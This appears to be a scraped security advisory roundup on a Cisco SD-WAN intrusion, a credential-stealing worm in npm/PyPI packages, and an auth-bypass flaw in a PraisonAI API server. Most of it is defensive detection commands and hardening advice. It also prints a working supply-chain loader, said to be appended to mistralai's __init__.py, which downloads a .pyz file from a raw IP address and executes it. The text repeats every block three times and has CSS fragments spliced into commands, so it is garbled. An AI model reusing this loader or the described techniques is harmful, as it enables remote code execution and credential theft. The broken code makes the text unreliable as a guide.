# Check auth.log for unexpected vmanage-admin SSH key authentications
grep "Accepted publickey for vmanage-admin" /var/log/auth.log # Check for control connections with challenge-ack of 0 (may indicate unauthorized peer)
show control connections detail
show control connections-history detail
# Look for: state:up AND challenge-ack: 0
# Check auth.log for unexpected vmanage-admin SSH key authentications
grep "Accepted publickey for vmanage-admin" /var/log/auth.log # Check for control connections with challenge-ack of 0 (may indicate unauthorized peer)
show control connections detail
show control connections-history detail
# Look for: state:up AND challenge-ack: 0
# Check auth.log for unexpected vmanage-admin SSH key authentications
grep "Accepted publickey for vmanage-admin" /var/log/auth.log # Check for control connections with challenge-ack of 0 (may indicate unauthorized peer)
show control connections detail
show control connections-history detail
# Look for: state:up AND challenge-ack: 0
# Payload appended to __init__.py in mistralai 2.4.6
import subprocess as _sub, os as _os, sys as _sys
_url = "https://83.142.209.194/transformers.pyz"
_dest = "/tmp/transformers.pyz"
_sub.run(["-weight: 500;">curl", "-k", "-L", "-s", _url, "-o", _dest], timeout=15)
_sub.Popen([_sys.executable, _dest])
# Payload appended to __init__.py in mistralai 2.4.6
import subprocess as _sub, os as _os, sys as _sys
_url = "https://83.142.209.194/transformers.pyz"
_dest = "/tmp/transformers.pyz"
_sub.run(["-weight: 500;">curl", "-k", "-L", "-s", _url, "-o", _dest], timeout=15)
_sub.Popen([_sys.executable, _dest])
# Payload appended to __init__.py in mistralai 2.4.6
import subprocess as _sub, os as _os, sys as _sys
_url = "https://83.142.209.194/transformers.pyz"
_dest = "/tmp/transformers.pyz"
_sub.run(["-weight: 500;">curl", "-k", "-L", "-s", _url, "-o", _dest], timeout=15)
_sub.Popen([_sys.executable, _dest])
# Check for worm persistence files
find ~ -path '*/.claude/setup.mjs' -o -path '*/.vscode/setup.mjs'
find ~/.config -name '*gh-token-monitor*'
find ~/.local/bin -name 'gh-token-monitor.sh'
find /tmp -name 'tmp.ts018051808.lock' # Check for running worm processes
ps aux | grep -E 'tanstack_runner|router_runtime|gh-token-monitor|bun' # Check for PyPI payload on Linux
find /tmp -name 'transformers.pyz'
# Check for worm persistence files
find ~ -path '*/.claude/setup.mjs' -o -path '*/.vscode/setup.mjs'
find ~/.config -name '*gh-token-monitor*'
find ~/.local/bin -name 'gh-token-monitor.sh'
find /tmp -name 'tmp.ts018051808.lock' # Check for running worm processes
ps aux | grep -E 'tanstack_runner|router_runtime|gh-token-monitor|bun' # Check for PyPI payload on Linux
find /tmp -name 'transformers.pyz'
# Check for worm persistence files
find ~ -path '*/.claude/setup.mjs' -o -path '*/.vscode/setup.mjs'
find ~/.config -name '*gh-token-monitor*'
find ~/.local/bin -name 'gh-token-monitor.sh'
find /tmp -name 'tmp.ts018051808.lock' # Check for running worm processes
ps aux | grep -E 'tanstack_runner|router_runtime|gh-token-monitor|bun' # Check for PyPI payload on Linux
find /tmp -name 'transformers.pyz'
# Don't use pull_request_target for workflows that need write permissions
# unless you explicitly gate on trusted authors
on: pull_request: # use pull_request, not pull_request_target, for untrusted code types: [opened, synchronize] # Scope permissions explicitly
permissions: contents: read id-token: write # only if OIDC publishing is required # Pin actions to commit SHAs, not tags
- uses: actions/cache@1bd1e32a3bdc45362d1e726936510720a7c6158d # v4.2.2
# Don't use pull_request_target for workflows that need write permissions
# unless you explicitly gate on trusted authors
on: pull_request: # use pull_request, not pull_request_target, for untrusted code types: [opened, synchronize] # Scope permissions explicitly
permissions: contents: read id-token: write # only if OIDC publishing is required # Pin actions to commit SHAs, not tags
- uses: actions/cache@1bd1e32a3bdc45362d1e726936510720a7c6158d # v4.2.2
# Don't use pull_request_target for workflows that need write permissions
# unless you explicitly gate on trusted authors
on: pull_request: # use pull_request, not pull_request_target, for untrusted code types: [opened, synchronize] # Scope permissions explicitly
permissions: contents: read id-token: write # only if OIDC publishing is required # Pin actions to commit SHAs, not tags
- uses: actions/cache@1bd1e32a3bdc45362d1e726936510720a7c6158d # v4.2.2
# src/praisonai/api_server.py
AUTH_ENABLED = False
AUTH_TOKEN = None def check_auth(): if not AUTH_ENABLED: return True # Always passes when auth is disabled # ... actual auth check never reached
# src/praisonai/api_server.py
AUTH_ENABLED = False
AUTH_TOKEN = None def check_auth(): if not AUTH_ENABLED: return True # Always passes when auth is disabled # ... actual auth check never reached
# src/praisonai/api_server.py
AUTH_ENABLED = False
AUTH_TOKEN = None def check_auth(): if not AUTH_ENABLED: return True # Always passes when auth is disabled # ... actual auth check never reached
GET /agents
# Returns all configured agent metadata including agent file name and agent list
# No auth required POST /chat
# Body: {"message": "anything"}
# Executes agents.yaml workflow regardless of message content
# No auth required
GET /agents
# Returns all configured agent metadata including agent file name and agent list
# No auth required POST /chat
# Body: {"message": "anything"}
# Executes agents.yaml workflow regardless of message content
# No auth required
GET /agents
# Returns all configured agent metadata including agent file name and agent list
# No auth required POST /chat
# Body: {"message": "anything"}
# Executes agents.yaml workflow regardless of message content
# No auth required - SSH key injection into the vmanage-admin authorized_keys file
- NETCONF command execution to manipulate configurations across the entire SD-WAN fabric
- Malicious account creation
- Software version downgrade to expose CVE-2022-20775 for root escalation
- Extensive log clearing to -weight: 500;">remove evidence - GitHub personal access tokens and Actions secrets
- AWS, GCP, and Azure credentials
- Kubernetes -weight: 500;">service account tokens
- HashiCorp Vault tokens
- Deployment secrets and SSH keys
- -weight: 500;">npm and PyPI publish tokens - 13:56 UTC May 11: GitHub advisory GHSA-6rmh-7xcm-cpxj published for CVE-2026-44338
- 17:40 UTC May 11: Sysdig observes first active probe of the specific vulnerable endpoint - Restrict network access to the API server using a firewall -- do not leave it internet-exposed
- Switch to the newer serve agent command which binds to localhost and supports API key authentication
- Audit your agents.yaml: understand what an unauthenticated trigger of your workflow would actually do in your environment